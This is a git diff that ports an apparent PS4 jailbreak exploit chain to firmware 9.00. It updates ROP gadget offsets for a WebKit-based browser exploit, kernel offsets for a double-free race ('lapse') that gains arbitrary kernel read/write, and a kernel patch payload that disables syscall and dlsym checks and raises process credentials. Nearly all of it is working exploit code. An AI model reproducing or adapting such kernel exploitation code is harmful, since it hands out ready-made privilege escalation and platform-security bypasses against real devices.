diff --git a/kpatch/80x.d b/kpatch/80x.d
deleted file mode 100644
index fc6d58d..0000000
--- a/kpatch/80x.d
+++ /dev/null
@@ -1 +0,0 @@
-80x.o 80x.d : 80x.c types.h utils.h
diff --git a/kpatch/80x.c b/kpatch/900.c
similarity index 97%
rename from kpatch/80x.c
rename to kpatch/900.c
index 9f90996..bff4857 100644
--- a/kpatch/80x.c
+++ b/kpatch/900.c
@@ -73,7 +73,7 @@ void do_patch(void) {
     //     // patch this to " = 0" instead
     //     is_invalid_syscall = -1;
     // }
-    write32(kbase, 0x390, 0);
+    write32(kbase, 0x490, 0);
     // these code corresponds to the check that ensures that the caller's
     // instruction pointer is inside the libkernel library's memory range
     //
@@ -115,7 +115,7 @@ void do_patch(void) {
     //     vm_map_unlock(map);
     //     return (KERN_PROTECTION_FAILURE);
     // }
-    write32(kbase, 0x00080B8B, 0);
+    write32(kbase, 0x80b8d, 0);
 
     // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
 
@@ -123,7 +123,7 @@ void do_patch(void) {
     // mov     r14, qword [rbp - 0xad0]
     // cmp     eax, 0x4000000
     // jb      ... ; patch jb to jmp
-    write8(kbase, 0x23B67F, 0xeb);
+    write8(kbase, 0x23b67f, 0xeb);
     // patch called function to always return 0
     //
     // sys_dynlib_dlsym:
@@ -168,7 +168,7 @@ void do_patch(void) {
     // .sy_narg = 6
     write32(kbase, offset_sysent_11, 6);
     // .sy_call = gadgets['jmp qword ptr [rsi]']
-    write64(kbase, offset_sysent_11 + 8, kbase + 0xe629c);
+    write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
     // .sy_thrcnt = SY_THR_STATIC
     write32(kbase, offset_sysent_11 + 0x2c, 1);
 
diff --git a/kpatch/900.d b/kpatch/900.d
new file mode 100644
index 0000000..96d04e3
--- /dev/null
+++ b/kpatch/900.d
@@ -0,0 +1 @@
+900.o 900.d : 900.c types.h utils.h
diff --git a/kpatch/80x.elf b/kpatch/900.elf
similarity index 96%
rename from kpatch/80x.elf
rename to kpatch/900.elf
index 6b76818..b7cb1f9 100644
Binary files a/kpatch/80x.elf and b/kpatch/900.elf differ
diff --git a/kpatch/80x.o b/kpatch/900.o
similarity index 86%
rename from kpatch/80x.o
rename to kpatch/900.o
index 06b1b92..9fde2d4 100644
Binary files a/kpatch/80x.o and b/kpatch/900.o differ
diff --git a/kpatch/Makefile b/kpatch/Makefile
index c6cb539..59e406e 100644
--- a/kpatch/Makefile
+++ b/kpatch/Makefile
@@ -1,4 +1,4 @@
-TARGET = 80x
+TARGET = 900
 ENTRY = 0x900000000
 src = $(TARGET).c
 
diff --git a/rop/900.mjs b/rop/900.mjs
index 790cf55..b6162c6 100644
--- a/rop/900.mjs
+++ b/rop/900.mjs
@@ -17,16 +17,13 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
 // by janisslsm (John) from ps4-dev discord
 
-import * as config from '/config.mjs';
-
 import { Int } from '/module/int64.mjs';
-import { log, align, die } from '/module/utils.mjs';
-import { Addr, mem } from '/module/mem.mjs';
-import { KB, MB } from '/module/constants.mjs';
+import { log, die } from '/module/utils.mjs';
+import { mem } from '/module/mem.mjs';
+import { KB} from '/module/constants.mjs';
 import { ChainBase } from '/module/chain.mjs';
 
 import {
-    make_buffer,
     find_base,
     get_view_vector,
     resolve_import,
@@ -34,7 +31,6 @@ import {
 } from '/module/memtools.mjs';
 
 import * as rw from '/module/rw.mjs';
-import * as o from '/module/offset.mjs';
 
 const origin = window.origin;
 const port = '8000';
@@ -42,9 +38,9 @@ const url = `${origin}:${port}`;
 
 const syscall_array = [];
 
-const offset_func_exec = 0x18;
+//const offset_func_exec = 0x18;
 const offset_textarea_impl = 0x18;
-const offset_js_inline_prop = 0x10;
+//const offset_js_inline_prop = 0x10;
 
 // WebKit offsets of imported functions
 const offset_wk_stack_chk_fail = 0x178;
@@ -142,44 +138,34 @@ const jop5 = 'pop rsp; ret';
 const rop_epilogue = 'leave; ret';
 
 const webkit_gadget_offsets = new Map(Object.entries({
-    'pop rax; ret' : 0x0000000000051a12,
-    'pop rbx; ret' : 0x00000000000be5d0,
-    'pop rcx; ret' : 0x00000000000657b7,
-    'pop rdx; ret' : 0x000000000000986c,
+    'pop rax; ret' : 0x0000000000051a12, // `58 c3`
+    'pop rbx; ret' : 0x00000000000be5d0, // `5b c3`
+    'pop rcx; ret' : 0x00000000000657b7, // `59 c3`
+    'pop rdx; ret' : 0x000000000000986c, // `5a c3`
 
-    'pop rbp; ret' : 0x00000000000000b6,
-    'pop rsi; ret' : 0x000000000001F4D6,
-    'pop rdi; ret' : 0x0000000000319690,
-    'pop rsp; ret' : 0x000000000004e293,
+    'pop rbp; ret' : 0x00000000000000b6, // `5d c3`
+    'pop rsi; ret' : 0x000000000001f4d6, // `5e c3`
+    'pop rdi; ret' : 0x0000000000319690, // `5f c3`
+    'pop rsp; ret' : 0x000000000004e293, // `5c c3`
 
-    'pop r8; ret' : 0x00000000001a7ef1,
-    'pop r9; ret' : 0x0000000000422571,
-    'pop r10; ret' : 0x0000000000e9e1d1,
-    'pop r11; ret' : 0x0000000000620df9,
+    'pop r8; ret' : 0x00000000001a7ef1, // `47 58 c3`
+    'pop r9; ret' : 0x0000000000422571, // `47 59 c3`
+    'pop r10; ret' : 0x0000000000e9e1d1, // `47 5a c3`
+    'pop r11; ret' : 0x00000000012b1d51, // `47 5b c3`
 
-    'pop r12; ret' : 0x000000000085ec71,
-    'pop r13; ret' : 0x00000000001da461,
-    'pop r14; ret' : 0x000000000001f4d5,
-    'pop r15; ret' : 0x000000000031968f,
+    'pop r12; ret' : 0x000000000085ec71, // `47 5c c3`
+    'pop r13; ret' : 0x00000000001da461, // `47 5d c3`
+    'pop r14; ret' : 0x0000000000685d73, // `47 5e c3`
+    'pop r15; ret' : 0x00000000006ab3aa, // `47 5f c3`
 
-    'ret' : 0x0000000000000032,
-    'leave; ret' : 0x000000000008db5b,
+    'ret' : 0x0000000000000032, // `c3`
+    'leave; ret' : 0x000000000008db5b, // `c9 c3`
 
-    'neg rax; and rax, rcx; ret' : 0x00000000019771c4,
-    'adc esi, esi; ret' : 0x000000000148874e,
-    'add rax, rdx; ret' : 0x00000000003f662c,
-    'push rsp; jmp qword ptr [rax]' : 0x0000000002bae87f,
-    'add rcx, rsi; and rdx, rcx; or rax, rdx; ret' : 0x0000000001b1ed66,
-    'pop rsi; jmp qword ptr [rax + 0x1c]' : 0x00000000021fce7e,
-
-    'mov qword ptr [rdi], rsi; ret' : 0x0000000000040300,
-    'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc,
-    'mov qword ptr [rdi], rax; ret' : 0x000000000000613b,
-    'mov dword ptr [rdi], eax; ret' : 0x000000000000613c,
-    'mov rdx, rcx; ret' : 0x000000000157fe71,
-
-    'mov dword ptr [rax], esi; ret' : 0x00000000005c3482,
-    'mov dword ptr [rdi], eax; ret' : 0x000000000000613c,
+    'mov rax, qword ptr [rax]; ret' : 0x00000000000241cc, // `48 8b 00 c3`
+    'mov qword ptr [rdi], rax; ret' : 0x000000000000613b, // `48 89 07 c3`
+    'mov dword ptr [rdi], eax; ret' : 0x000000000000613c, // `89 07 c3`
+    'mov dword ptr [rax], esi; ret' : 0x00000000005c3482, // `89 30 c3`
+  
 
     [jop2] : 0x0000000000683800,
     [jop3] : 0x0000000000303906,
@@ -192,13 +178,8 @@ const webkit_gadget_offsets = new Map(Object.entries({
 }));
 
 const libc_gadget_offsets = new Map(Object.entries({
-    'neg rax; ret' : 0x00000000000d3f03,
-    'mov rdx, rax; xor eax, eax; shl rdx, cl; ret' : 0x00000000000cefd9,
-    'mov qword ptr [rsi], rcx; ret' : 0x00000000000cf982,
-    'setjmp' : offset_libc_setjmp,
-    'longjmp' : offset_libc_longjmp,
-    'getcontext' : 0x24F04,
-    'setcontext' : 0x638,
+    'getcontext' : 0x24f04,
+    'setcontext' : 0x29448,
 }));
 
 const libkernel_gadget_offsets = new Map(Object.entries({
@@ -451,7 +432,7 @@ class Chain900Base extends ChainBase {
 
         // Padding as longjmp() pushes the rdi and return address in the
         // jmp_buf at the target rsp.
-        this.push_constant(0);
+        //this.push_constant(0);
         this.push_constant(0);
         const target_rsp = this.stack_addr.add(this.position);
 
diff --git a/scripts/lapse.mjs b/scripts/lapse.mjs
index 0df2697..f61ed86 100644
--- a/scripts/lapse.mjs
+++ b/scripts/lapse.mjs
@@ -706,9 +706,8 @@ function double_free_reqs2(sds) {
         aio_multi_poll(aio_ids_p, num_reqs);
 
         // drop the reference so that aio_multi_delete() will trigger _fdrop()
-        close(sd_client);
-
         const res = race_one(req_addr, sd_conn, barrier, racer, sds);
+        //alert(res);
         racer.reset();
 
         // MEMLEAK: if we won the race, aio_obj.ao_num_reqs got decremented
@@ -717,6 +716,7 @@ function double_free_reqs2(sds) {
         close(sd_conn);
 
         if (res !== null) {
+            
             log(`won race at attempt: ${i}`);
             close(sd_listen);
             call_nze('pthread_barrier_destroy', barrier.addr);
@@ -1243,13 +1243,13 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
 
     // TODO FW dependent parts! assume ps4 9.000 for now
     //TODO: Needs porting to 9.00
-    const off_kstr = 0x7edcff;
+    const off_kstr = 0x7f6f27;
     const kbase = kernel_addr.sub(off_kstr);
     log(`kernel base: ${kbase}`);
 
     log('\nmaking arbitrary kernel read/write');
     const cpuid = 7 - main_core;
-    const off_cpuid_to_pcpu = 0x228e6b0;
+    const off_cpuid_to_pcpu = 0x21ef2a0;
     const pcpu_p = kbase.add(off_cpuid_to_pcpu + cpuid*8);
     log(`cpuid_to_pcpu[${cpuid}]: ${pcpu_p}`);
     const pcpu = kread64(pcpu_p);
@@ -1525,7 +1525,7 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
     // cr_sceCaps[1]
     kmem.write64(p_ucred.add(0x68), -1);
 
-    const buf = await get_patches('/kpatch/80x.elf');
+    const buf = await get_patches('/kpatch/900.elf');
     // FIXME handle .bss segment properly
     // assume start of loadable segments is at offset 0x1000
     const patches = new View1(await buf, 0x1000);